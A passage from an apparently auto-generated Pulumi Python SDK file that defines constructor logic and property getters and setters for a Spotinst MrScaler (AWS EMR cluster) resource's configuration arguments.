    :param pulumi.Input[Sequence[pulumi.Input[str]]] additional_replica_security_groups: A list of additional Amazon EC2 security group IDs for the core and task nodes.
    :param pulumi.Input[Sequence[pulumi.Input['MrScalarApplicationArgs']]] applications: A case-insensitive list of applications for Amazon EMR to install and configure when launching the cluster
    :param pulumi.Input[Sequence[pulumi.Input[str]]] availability_zones: List of AZs and their subnet Ids. See example above for usage.
    :param pulumi.Input[Sequence[pulumi.Input['MrScalarBootstrapActionsFileArgs']]] bootstrap_actions_files: Describes path to S3 file containing description of bootstrap actions. [More Information](https://api.spotinst.com/elastigroup-for-aws/services-integrations/elastic-mapreduce/import-an-emr-cluster/advanced/)
    :param pulumi.Input[str] cluster_id: The MrScaler cluster id.
    :param pulumi.Input[Sequence[pulumi.Input['MrScalarConfigurationsFileArgs']]] configurations_files: Describes path to S3 file containing description of configurations. [More Information](https://api.spotinst.com/elastigroup-for-aws/services-integrations/elastic-mapreduce/import-an-emr-cluster/advanced/)
    :param pulumi.Input[int] core_desired_capacity: amount of instances in core group.
    :param pulumi.Input[Sequence[pulumi.Input['MrScalarCoreEbsBlockDeviceArgs']]] core_ebs_block_devices: This determines the ebs configuration for your core group instances. Only a single block is allowed.
    :param pulumi.Input[bool] core_ebs_optimized: EBS Optimization setting for instances in group.
    :param pulumi.Input[Sequence[pulumi.Input[str]]] core_instance_types: The MrScaler instance types for the core nodes.
    :param pulumi.Input[str] core_lifecycle: The MrScaler lifecycle for instances in core group. Allowed values are 'SPOT' and 'ON_DEMAND'.
    :param pulumi.Input[int] core_max_size: maximal amount of instances in core group.
    :param pulumi.Input[int] core_min_size: The minimal amount of instances in core group.
    :param pulumi.Input[Sequence[pulumi.Input['MrScalarCoreScalingDownPolicyArgs']]] core_scaling_down_policies: Down-scaling policies for the core group.
    :param pulumi.Input[Sequence[pulumi.Input['MrScalarCoreScalingUpPolicyArgs']]] core_scaling_up_policies: Up-scaling policies for the core group.
    :param pulumi.Input[str] core_unit: Unit of task group for target, min and max. The unit could be `instance` or `weight`. instance - amount of instances. weight - amount of vCPU.
    :param pulumi.Input[str] custom_ami_id: The ID of a custom Amazon EBS-backed Linux AMI if the cluster uses a custom AMI.
    :param pulumi.Input[str] description: The MrScaler description.
    :param pulumi.Input[int] ebs_root_volume_size: Size of the EBS root device volume (units not documented here — presumably GiB; confirm).
    :param pulumi.Input[str] ec2_key_name: The name of an Amazon EC2 key pair that can be used to ssh to the master node.
    :param pulumi.Input[bool] expose_cluster_id: Allow the `cluster_id` to set a provider output variable.
    :param pulumi.Input[Sequence[pulumi.Input['MrScalarInstanceWeightArgs']]] instance_weights: Describes the instance and weights. Check out [Elastigroup Weighted Instances](https://api.spotinst.com/elastigroup-for-aws/concepts/general-concepts/elastigroup-capacity-instances-or-weighted) for more info.
    :param pulumi.Input[str] job_flow_role: The IAM role that was specified when the job flow was launched. The EC2 instances of the job flow assume this role.
    :param pulumi.Input[bool] keep_job_flow_alive: Specifies whether the cluster should remain available after completing all steps.
    :param pulumi.Input[str] log_uri: The path to the Amazon S3 location where logs for this cluster are stored.
    :param pulumi.Input[str] managed_primary_security_group: EMR Managed Security group that will be set to the primary instance group.
    :param pulumi.Input[str] managed_replica_security_group: EMR Managed Security group that will be set to the replica instance group.
    :param pulumi.Input[Sequence[pulumi.Input['MrScalarMasterEbsBlockDeviceArgs']]] master_ebs_block_devices: This determines the ebs configuration for your master group instances. Only a single block is allowed.
    :param pulumi.Input[bool] master_ebs_optimized: EBS Optimization setting for instances in group.
    :param pulumi.Input[Sequence[pulumi.Input[str]]] master_instance_types: The MrScaler instance types for the master nodes.
    :param pulumi.Input[str] master_lifecycle: The MrScaler lifecycle for instances in master group. Allowed values are 'SPOT' and 'ON_DEMAND'.
    :param pulumi.Input[int] master_target: Number of instances in the master group.
    :param pulumi.Input[str] name: The application name.
    :param pulumi.Input[str] output_cluster_id: Output field holding the cluster id (presumably populated when `expose_cluster_id` is set — confirm).
    :param pulumi.Input['MrScalarProvisioningTimeoutArgs'] provisioning_timeout: Provisioning timeout configuration block.
    :param pulumi.Input[str] region: The MrScaler region.
    :param pulumi.Input[str] release_label: The cluster release label (`releaseLabel`).
    :param pulumi.Input[str] repo_upgrade_on_boot: Applies only when `custom_ami_id` is used. Specifies the type of updates that are applied from the Amazon Linux AMI package repositories when an instance boots using the AMI. Possible values include: `SECURITY`, `NONE`.
    :param pulumi.Input[int] retries: Specifies the maximum number of times a capacity provisioning should be retried if the provisioning timeout is exceeded. Valid values: `1-5`.
    :param pulumi.Input[Sequence[pulumi.Input['MrScalarScheduledTaskArgs']]] scheduled_tasks: An array of scheduled tasks.
    :param pulumi.Input[str] security_config: The name of the security configuration applied to the cluster.
    :param pulumi.Input[str] service_access_security_group: The identifier of the Amazon EC2 security group for the Amazon EMR service to access clusters in VPC private subnets.
    :param pulumi.Input[str] service_role: The IAM role that will be assumed by the Amazon EMR service to access AWS resources on your behalf.
    :param pulumi.Input[Sequence[pulumi.Input['MrScalarStepsFileArgs']]] steps_files: Steps from S3.
    :param pulumi.Input[str] strategy: The MrScaler strategy. Allowed values are `new` `clone` and `wrap`.
    :param pulumi.Input[Sequence[pulumi.Input['MrScalarTagArgs']]] tags: A list of tags to assign to the resource. You may define multiple tags.
    :param pulumi.Input[int] task_desired_capacity: amount of instances in task group.
    :param pulumi.Input[Sequence[pulumi.Input['MrScalarTaskEbsBlockDeviceArgs']]] task_ebs_block_devices: This determines the ebs configuration for your task group instances. Only a single block is allowed.
    :param pulumi.Input[bool] task_ebs_optimized: EBS Optimization setting for instances in group.
    :param pulumi.Input[Sequence[pulumi.Input[str]]] task_instance_types: The MrScaler instance types for the task nodes.
    :param pulumi.Input[str] task_lifecycle: The MrScaler lifecycle for instances in task group. Allowed values are 'SPOT' and 'ON_DEMAND'.
    :param pulumi.Input[int] task_max_size: maximal amount of instances in task group.
    :param pulumi.Input[int] task_min_size: The minimal amount of instances in task group.
    :param pulumi.Input[Sequence[pulumi.Input['MrScalarTaskScalingDownPolicyArgs']]] task_scaling_down_policies: Down-scaling policies for the task group.
    :param pulumi.Input[Sequence[pulumi.Input['MrScalarTaskScalingUpPolicyArgs']]] task_scaling_up_policies: Up-scaling policies for the task group.
    :param pulumi.Input[str] task_unit: Unit of task group for target, min and max. The unit could be `instance` or `weight`. instance - amount of instances. weight - amount of vCPU.
    :param pulumi.Input[Sequence[pulumi.Input['MrScalarTerminationPolicyArgs']]] termination_policies: Allows defining termination policies for EMR clusters based on CloudWatch Metrics.
    :param pulumi.Input[bool] termination_protected: Specifies whether the Amazon EC2 instances in the cluster are protected from termination by API calls, user intervention, or in the event of a job-flow error.
    :param pulumi.Input[bool] visible_to_all_users: Deprecated — this field has been removed from the API and is no longer functional.
    """
    # Only set fields the caller actually supplied; pulumi.set backs the
    # generated properties below.
    if additional_info is not None:
        pulumi.set(__self__, "additional_info", additional_info)
    if additional_primary_security_groups is not None:
        pulumi.set(__self__, "additional_primary_security_groups", additional_primary_security_groups)
    if additional_replica_security_groups is not None:
        pulumi.set(__self__, "additional_replica_security_groups", additional_replica_security_groups)
    if applications is not None:
        pulumi.set(__self__, "applications", applications)
    if availability_zones is not None:
        pulumi.set(__self__, "availability_zones", availability_zones)
    if bootstrap_actions_files is not None:
        pulumi.set(__self__, "bootstrap_actions_files", bootstrap_actions_files)
    if cluster_id is not None:
        pulumi.set(__self__, "cluster_id", cluster_id)
    if configurations_files is not None:
        pulumi.set(__self__, "configurations_files", configurations_files)
    if core_desired_capacity is not None:
        pulumi.set(__self__, "core_desired_capacity", core_desired_capacity)
    if core_ebs_block_devices is not None:
        pulumi.set(__self__, "core_ebs_block_devices", core_ebs_block_devices)
    if core_ebs_optimized is not None:
        pulumi.set(__self__, "core_ebs_optimized", core_ebs_optimized)
    if core_instance_types is not None:
        pulumi.set(__self__, "core_instance_types", core_instance_types)
    if core_lifecycle is not None:
        pulumi.set(__self__, "core_lifecycle", core_lifecycle)
    if core_max_size is not None:
        pulumi.set(__self__, "core_max_size", core_max_size)
    if core_min_size is not None:
        pulumi.set(__self__, "core_min_size", core_min_size)
    if core_scaling_down_policies is not None:
        pulumi.set(__self__, "core_scaling_down_policies", core_scaling_down_policies)
    if core_scaling_up_policies is not None:
        pulumi.set(__self__, "core_scaling_up_policies", core_scaling_up_policies)
    if core_unit is not None:
        pulumi.set(__self__, "core_unit", core_unit)
    if custom_ami_id is not None:
        pulumi.set(__self__, "custom_ami_id", custom_ami_id)
    if description is not None:
        pulumi.set(__self__, "description", description)
    if ebs_root_volume_size is not None:
        pulumi.set(__self__, "ebs_root_volume_size", ebs_root_volume_size)
    if ec2_key_name is not None:
        pulumi.set(__self__, "ec2_key_name", ec2_key_name)
    if expose_cluster_id is not None:
        pulumi.set(__self__, "expose_cluster_id", expose_cluster_id)
    if instance_weights is not None:
        pulumi.set(__self__, "instance_weights", instance_weights)
    if job_flow_role is not None:
        pulumi.set(__self__, "job_flow_role", job_flow_role)
    if keep_job_flow_alive is not None:
        pulumi.set(__self__, "keep_job_flow_alive", keep_job_flow_alive)
    if log_uri is not None:
        pulumi.set(__self__, "log_uri", log_uri)
    if managed_primary_security_group is not None:
        pulumi.set(__self__, "managed_primary_security_group", managed_primary_security_group)
    if managed_replica_security_group is not None:
        pulumi.set(__self__, "managed_replica_security_group", managed_replica_security_group)
    if master_ebs_block_devices is not None:
        pulumi.set(__self__, "master_ebs_block_devices", master_ebs_block_devices)
    if master_ebs_optimized is not None:
        pulumi.set(__self__, "master_ebs_optimized", master_ebs_optimized)
    if master_instance_types is not None:
        pulumi.set(__self__, "master_instance_types", master_instance_types)
    if master_lifecycle is not None:
        pulumi.set(__self__, "master_lifecycle", master_lifecycle)
    if master_target is not None:
        pulumi.set(__self__, "master_target", master_target)
    if name is not None:
        pulumi.set(__self__, "name", name)
    if output_cluster_id is not None:
        pulumi.set(__self__, "output_cluster_id", output_cluster_id)
    if provisioning_timeout is not None:
        pulumi.set(__self__, "provisioning_timeout", provisioning_timeout)
    if region is not None:
        pulumi.set(__self__, "region", region)
    if release_label is not None:
        pulumi.set(__self__, "release_label", release_label)
    if repo_upgrade_on_boot is not None:
        pulumi.set(__self__, "repo_upgrade_on_boot", repo_upgrade_on_boot)
    if retries is not None:
        pulumi.set(__self__, "retries", retries)
    if scheduled_tasks is not None:
        pulumi.set(__self__, "scheduled_tasks", scheduled_tasks)
    if security_config is not None:
        pulumi.set(__self__, "security_config", security_config)
    if service_access_security_group is not None:
        pulumi.set(__self__, "service_access_security_group", service_access_security_group)
    if service_role is not None:
        pulumi.set(__self__, "service_role", service_role)
    if steps_files is not None:
        pulumi.set(__self__, "steps_files", steps_files)
    if strategy is not None:
        pulumi.set(__self__, "strategy", strategy)
    if tags is not None:
        pulumi.set(__self__, "tags", tags)
    if task_desired_capacity is not None:
        pulumi.set(__self__, "task_desired_capacity", task_desired_capacity)
    if task_ebs_block_devices is not None:
        pulumi.set(__self__, "task_ebs_block_devices", task_ebs_block_devices)
    if task_ebs_optimized is not None:
        pulumi.set(__self__, "task_ebs_optimized", task_ebs_optimized)
    if task_instance_types is not None:
        pulumi.set(__self__, "task_instance_types", task_instance_types)
    if task_lifecycle is not None:
        pulumi.set(__self__, "task_lifecycle", task_lifecycle)
    if task_max_size is not None:
        pulumi.set(__self__, "task_max_size", task_max_size)
    if task_min_size is not None:
        pulumi.set(__self__, "task_min_size", task_min_size)
    if task_scaling_down_policies is not None:
        pulumi.set(__self__, "task_scaling_down_policies", task_scaling_down_policies)
    if task_scaling_up_policies is not None:
        pulumi.set(__self__, "task_scaling_up_policies", task_scaling_up_policies)
    if task_unit is not None:
        pulumi.set(__self__, "task_unit", task_unit)
    if termination_policies is not None:
        pulumi.set(__self__, "termination_policies", termination_policies)
    if termination_protected is not None:
        pulumi.set(__self__, "termination_protected", termination_protected)
    # Merged the two identical `is not None` guards the generator emitted:
    # warn about the deprecated field and store it in a single branch.
    if visible_to_all_users is not None:
        warnings.warn("""This field has been removed from our API and is no longer functional.""", DeprecationWarning)
        pulumi.log.warn("""visible_to_all_users is deprecated: This field has been removed from our API and is no longer functional.""")
        pulumi.set(__self__, "visible_to_all_users", visible_to_all_users)
@property
@pulumi.getter(name="additionalInfo")
def additional_info(self) -> Optional[pulumi.Input[str]]:
"""
This is meta information about third-party applications that third-party vendors use for testing purposes.
"""
return pulumi.get(self, "additional_info")
@additional_info.setter
def additional_info(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "additional_info", value)
@property
@pulumi.getter(name="additionalPrimarySecurityGroups")
def additional_primary_security_groups(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A list of additional Amazon EC2 security group IDs for the master node.
"""
return pulumi.get(self, "additional_primary_security_groups")
@additional_primary_security_groups.setter
def additional_primary_security_groups(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "additional_primary_security_groups", value)
@property
@pulumi.getter(name="additionalReplicaSecurityGroups")
def additional_replica_security_groups(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A list of additional Amazon EC2 security group IDs for the core and task nodes.
"""
return pulumi.get(self, "additional_replica_security_groups")
@additional_replica_security_groups.setter
def additional_replica_security_groups(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "additional_replica_security_groups", value)
@property
@pulumi.getter
def applications(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarApplicationArgs']]]]:
"""
A case-insensitive list of applications for Amazon EMR to install and configure when launching the cluster
"""
return pulumi.get(self, "applications")
@applications.setter
def applications(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarApplicationArgs']]]]):
pulumi.set(self, "applications", value)
@property
@pulumi.getter(name="availabilityZones")
def availability_zones(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
List of AZs and their subnet Ids. See example above for usage.
"""
return pulumi.get(self, "availability_zones")
@availability_zones.setter
def availability_zones(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "availability_zones", value)
@property
@pulumi.getter(name="bootstrapActionsFiles")
def bootstrap_actions_files(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarBootstrapActionsFileArgs']]]]:
"""
Describes path to S3 file containing description of bootstrap actions. [More Information](https://api.spotinst.com/elastigroup-for-aws/services-integrations/elastic-mapreduce/import-an-emr-cluster/advanced/)
"""
return pulumi.get(self, "bootstrap_actions_files")
@bootstrap_actions_files.setter
def bootstrap_actions_files(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarBootstrapActionsFileArgs']]]]):
pulumi.set(self, "bootstrap_actions_files", value)
@property
@pulumi.getter(name="clusterId")
def cluster_id(self) -> Optional[pulumi.Input[str]]:
"""
The MrScaler cluster id.
"""
return pulumi.get(self, "cluster_id")
@cluster_id.setter
def cluster_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "cluster_id", value)
@property
@pulumi.getter(name="configurationsFiles")
def configurations_files(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarConfigurationsFileArgs']]]]:
"""
Describes path to S3 file containing description of configurations. [More Information](https://api.spotinst.com/elastigroup-for-aws/services-integrations/elastic-mapreduce/import-an-emr-cluster/advanced/)
"""
return pulumi.get(self, "configurations_files")
@configurations_files.setter
def configurations_files(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarConfigurationsFileArgs']]]]):
pulumi.set(self, "configurations_files", value)
@property
@pulumi.getter(name="coreDesiredCapacity")
def core_desired_capacity(self) -> Optional[pulumi.Input[int]]:
"""
amount of instances in core group.
"""
return pulumi.get(self, "core_desired_capacity")
@core_desired_capacity.setter
def core_desired_capacity(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "core_desired_capacity", value)
@property
@pulumi.getter(name="coreEbsBlockDevices")
def core_ebs_block_devices(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarCoreEbsBlockDeviceArgs']]]]:
"""
This determines the ebs configuration for your core group instances. Only a single block is allowed.
"""
return pulumi.get(self, "core_ebs_block_devices")
@core_ebs_block_devices.setter
def core_ebs_block_devices(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarCoreEbsBlockDeviceArgs']]]]):
pulumi.set(self, "core_ebs_block_devices", value)
@property
@pulumi.getter(name="coreEbsOptimized")
def core_ebs_optimized(self) -> Optional[pulumi.Input[bool]]:
"""
EBS Optimization setting for instances in group.
"""
return pulumi.get(self, "core_ebs_optimized")
@core_ebs_optimized.setter
def core_ebs_optimized(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "core_ebs_optimized", value)
@property
@pulumi.getter(name="coreInstanceTypes")
def core_instance_types(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
The MrScaler instance types for the core nodes.
"""
return pulumi.get(self, "core_instance_types")
@core_instance_types.setter
def core_instance_types(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "core_instance_types", value)
@property
@pulumi.getter(name="coreLifecycle")
def core_lifecycle(self) -> Optional[pulumi.Input[str]]:
"""
The MrScaler lifecycle for instances in core group. Allowed values are 'SPOT' and 'ON_DEMAND'.
"""
return pulumi.get(self, "core_lifecycle")
@core_lifecycle.setter
def core_lifecycle(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "core_lifecycle", value)
@property
@pulumi.getter(name="coreMaxSize")
def core_max_size(self) -> Optional[pulumi.Input[int]]:
"""
maximal amount of instances in core group.
"""
return pulumi.get(self, "core_max_size")
@core_max_size.setter
def core_max_size(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "core_max_size", value)
@property
@pulumi.getter(name="coreMinSize")
def core_min_size(self) -> Optional[pulumi.Input[int]]:
"""
The minimal amount of instances in core group.
"""
return pulumi.get(self, "core_min_size")
@core_min_size.setter
def core_min_size(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "core_min_size", value)
    @property
    @pulumi.getter(name="coreScalingDownPolicies")
    def core_scaling_down_policies(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarCoreScalingDownPolicyArgs']]]]:
        """
        Scaling-down policies for the core group (see `MrScalarCoreScalingDownPolicyArgs`).
        """
        return pulumi.get(self, "core_scaling_down_policies")
    @core_scaling_down_policies.setter
    def core_scaling_down_policies(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarCoreScalingDownPolicyArgs']]]]):
        pulumi.set(self, "core_scaling_down_policies", value)
    @property
    @pulumi.getter(name="coreScalingUpPolicies")
    def core_scaling_up_policies(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarCoreScalingUpPolicyArgs']]]]:
        """
        Scaling-up policies for the core group (see `MrScalarCoreScalingUpPolicyArgs`).
        """
        return pulumi.get(self, "core_scaling_up_policies")
    @core_scaling_up_policies.setter
    def core_scaling_up_policies(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarCoreScalingUpPolicyArgs']]]]):
        pulumi.set(self, "core_scaling_up_policies", value)
@property
@pulumi.getter(name="coreUnit")
def core_unit(self) -> Optional[pulumi.Input[str]]:
"""
Unit of task group for target, min and max. The unit could be `instance` or `weight`. instance - amount of instances. weight - amount of vCPU.
"""
return pulumi.get(self, "core_unit")
@core_unit.setter
def core_unit(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "core_unit", value)
@property
@pulumi.getter(name="customAmiId")
def custom_ami_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of a custom Amazon EBS-backed Linux AMI if the cluster uses a custom AMI.
"""
return pulumi.get(self, "custom_ami_id")
@custom_ami_id.setter
def custom_ami_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "custom_ami_id", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
The MrScaler description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
    @property
    @pulumi.getter(name="ebsRootVolumeSize")
    def ebs_root_volume_size(self) -> Optional[pulumi.Input[int]]:
        """
        Size of the EBS root device volume — presumably in GiB, as with EMR's EbsRootVolumeSize; confirm against the provider docs.
        """
        return pulumi.get(self, "ebs_root_volume_size")
    @ebs_root_volume_size.setter
    def ebs_root_volume_size(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "ebs_root_volume_size", value)
@property
@pulumi.getter(name="ec2KeyName")
def ec2_key_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of an Amazon EC2 key pair that can be used to ssh to the master node.
"""
return pulumi.get(self, "ec2_key_name")
@ec2_key_name.setter
def ec2_key_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "ec2_key_name", value)
@property
@pulumi.getter(name="exposeClusterId")
def expose_cluster_id(self) -> Optional[pulumi.Input[bool]]:
"""
Allow the `cluster_id` to set a provider output variable.
"""
return pulumi.get(self, "expose_cluster_id")
@expose_cluster_id.setter
def expose_cluster_id(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "expose_cluster_id", value)
@property
@pulumi.getter(name="instanceWeights")
def instance_weights(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarInstanceWeightArgs']]]]:
"""
Describes the instance and weights. Check out [Elastigroup Weighted Instances](https://api.spotinst.com/elastigroup-for-aws/concepts/general-concepts/elastigroup-capacity-instances-or-weighted) for more info.
"""
return pulumi.get(self, "instance_weights")
@instance_weights.setter
def instance_weights(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarInstanceWeightArgs']]]]):
pulumi.set(self, "instance_weights", value)
@property
@pulumi.getter(name="jobFlowRole")
def job_flow_role(self) -> Optional[pulumi.Input[str]]:
"""
The IAM role that was specified when the job flow was launched. The EC2 instances of the job flow assume this role.
"""
return pulumi.get(self, "job_flow_role")
@job_flow_role.setter
def job_flow_role(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "job_flow_role", value)
@property
@pulumi.getter(name="keepJobFlowAlive")
def keep_job_flow_alive(self) -> Optional[pulumi.Input[bool]]:
"""
Specifies whether the cluster should remain available after completing all steps.
"""
return pulumi.get(self, "keep_job_flow_alive")
@keep_job_flow_alive.setter
def keep_job_flow_alive(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "keep_job_flow_alive", value)
@property
@pulumi.getter(name="logUri")
def log_uri(self) -> Optional[pulumi.Input[str]]:
"""
The path to the Amazon S3 location where logs for this cluster are stored.
"""
return pulumi.get(self, "log_uri")
@log_uri.setter
def log_uri(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "log_uri", value)
@property
@pulumi.getter(name="managedPrimarySecurityGroup")
def managed_primary_security_group(self) -> Optional[pulumi.Input[str]]:
"""
EMR Managed Security group that will be set to the primary instance group.
"""
return pulumi.get(self, "managed_primary_security_group")
@managed_primary_security_group.setter
def managed_primary_security_group(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "managed_primary_security_group", value)
@property
@pulumi.getter(name="managedReplicaSecurityGroup")
def managed_replica_security_group(self) -> Optional[pulumi.Input[str]]:
"""
EMR Managed Security group that will be set to the replica instance group.
"""
return pulumi.get(self, "managed_replica_security_group")
@managed_replica_security_group.setter
def managed_replica_security_group(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "managed_replica_security_group", value)
@property
@pulumi.getter(name="masterEbsBlockDevices")
def master_ebs_block_devices(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarMasterEbsBlockDeviceArgs']]]]:
"""
This determines the ebs configuration for your master group instances. Only a single block is allowed.
"""
return pulumi.get(self, "master_ebs_block_devices")
@master_ebs_block_devices.setter
def master_ebs_block_devices(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarMasterEbsBlockDeviceArgs']]]]):
pulumi.set(self, "master_ebs_block_devices", value)
@property
@pulumi.getter(name="masterEbsOptimized")
def master_ebs_optimized(self) -> Optional[pulumi.Input[bool]]:
"""
EBS Optimization setting for instances in group.
"""
return pulumi.get(self, "master_ebs_optimized")
@master_ebs_optimized.setter
def master_ebs_optimized(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "master_ebs_optimized", value)
@property
@pulumi.getter(name="masterInstanceTypes")
def master_instance_types(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
The MrScaler instance types for the master nodes.
"""
return pulumi.get(self, "master_instance_types")
@master_instance_types.setter
def master_instance_types(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "master_instance_types", value)
@property
@pulumi.getter(name="masterLifecycle")
def master_lifecycle(self) -> Optional[pulumi.Input[str]]:
"""
The MrScaler lifecycle for instances in master group. Allowed values are 'SPOT' and 'ON_DEMAND'.
"""
return pulumi.get(self, "master_lifecycle")
@master_lifecycle.setter
def master_lifecycle(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "master_lifecycle", value)
@property
@pulumi.getter(name="masterTarget")
def master_target(self) -> Optional[pulumi.Input[int]]:
"""
Number of instances in the master group.
"""
return pulumi.get(self, "master_target")
@master_target.setter
def master_target(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "master_target", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The application name.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
    @property
    @pulumi.getter(name="outputClusterId")
    def output_cluster_id(self) -> Optional[pulumi.Input[str]]:
        """
        The cluster id the provider reports back — per the usage example, exported when `expose_cluster_id` is enabled.
        """
        return pulumi.get(self, "output_cluster_id")
    @output_cluster_id.setter
    def output_cluster_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "output_cluster_id", value)
    @property
    @pulumi.getter(name="provisioningTimeout")
    def provisioning_timeout(self) -> Optional[pulumi.Input['MrScalarProvisioningTimeoutArgs']]:
        """
        Provisioning timeout settings (`timeout` in minutes plus a `timeout_action`, e.g. `terminateAndRetry`).
        """
        return pulumi.get(self, "provisioning_timeout")
    @provisioning_timeout.setter
    def provisioning_timeout(self, value: Optional[pulumi.Input['MrScalarProvisioningTimeoutArgs']]):
        pulumi.set(self, "provisioning_timeout", value)
@property
@pulumi.getter
def region(self) -> Optional[pulumi.Input[str]]:
"""
The MrScaler region.
"""
return pulumi.get(self, "region")
@region.setter
def region(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "region", value)
    @property
    @pulumi.getter(name="releaseLabel")
    def release_label(self) -> Optional[pulumi.Input[str]]:
        """
        The EMR release label (e.g. `emr-5.17.0`, as in the usage example).
        """
        return pulumi.get(self, "release_label")
    @release_label.setter
    def release_label(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "release_label", value)
@property
@pulumi.getter(name="repoUpgradeOnBoot")
def repo_upgrade_on_boot(self) -> Optional[pulumi.Input[str]]:
"""
Applies only when `custom_ami_id` is used. Specifies the type of updates that are applied from the Amazon Linux AMI package repositories when an instance boots using the AMI. Possible values include: `SECURITY`, `NONE`.
"""
return pulumi.get(self, "repo_upgrade_on_boot")
@repo_upgrade_on_boot.setter
def repo_upgrade_on_boot(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "repo_upgrade_on_boot", value)
@property
@pulumi.getter
def retries(self) -> Optional[pulumi.Input[int]]:
"""
Specifies the maximum number of times a capacity provisioning should be retried if the provisioning timeout is exceeded. Valid values: `1-5`.
"""
return pulumi.get(self, "retries")
@retries.setter
def retries(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "retries", value)
@property
@pulumi.getter(name="scheduledTasks")
def scheduled_tasks(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarScheduledTaskArgs']]]]:
"""
An array of scheduled tasks.
"""
return pulumi.get(self, "scheduled_tasks")
@scheduled_tasks.setter
def scheduled_tasks(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarScheduledTaskArgs']]]]):
pulumi.set(self, "scheduled_tasks", value)
@property
@pulumi.getter(name="securityConfig")
def security_config(self) -> Optional[pulumi.Input[str]]:
"""
The name of the security configuration applied to the cluster.
"""
return pulumi.get(self, "security_config")
@security_config.setter
def security_config(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "security_config", value)
@property
@pulumi.getter(name="serviceAccessSecurityGroup")
def service_access_security_group(self) -> Optional[pulumi.Input[str]]:
"""
The identifier of the Amazon EC2 security group for the Amazon EMR service to access clusters in VPC private subnets.
"""
return pulumi.get(self, "service_access_security_group")
@service_access_security_group.setter
def service_access_security_group(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "service_access_security_group", value)
@property
@pulumi.getter(name="serviceRole")
def service_role(self) -> Optional[pulumi.Input[str]]:
"""
The IAM role that will be assumed by the Amazon EMR service to access AWS resources on your behalf.
"""
return pulumi.get(self, "service_role")
@service_role.setter
def service_role(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "service_role", value)
@property
@pulumi.getter(name="stepsFiles")
def steps_files(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarStepsFileArgs']]]]:
"""
Steps from S3.
"""
return pulumi.get(self, "steps_files")
@steps_files.setter
def steps_files(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarStepsFileArgs']]]]):
pulumi.set(self, "steps_files", value)
@property
@pulumi.getter
def strategy(self) -> Optional[pulumi.Input[str]]:
"""
The MrScaler strategy. Allowed values are `new` `clone` and `wrap`.
"""
return pulumi.get(self, "strategy")
@strategy.setter
def strategy(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "strategy", value)
@property
@pulumi.getter
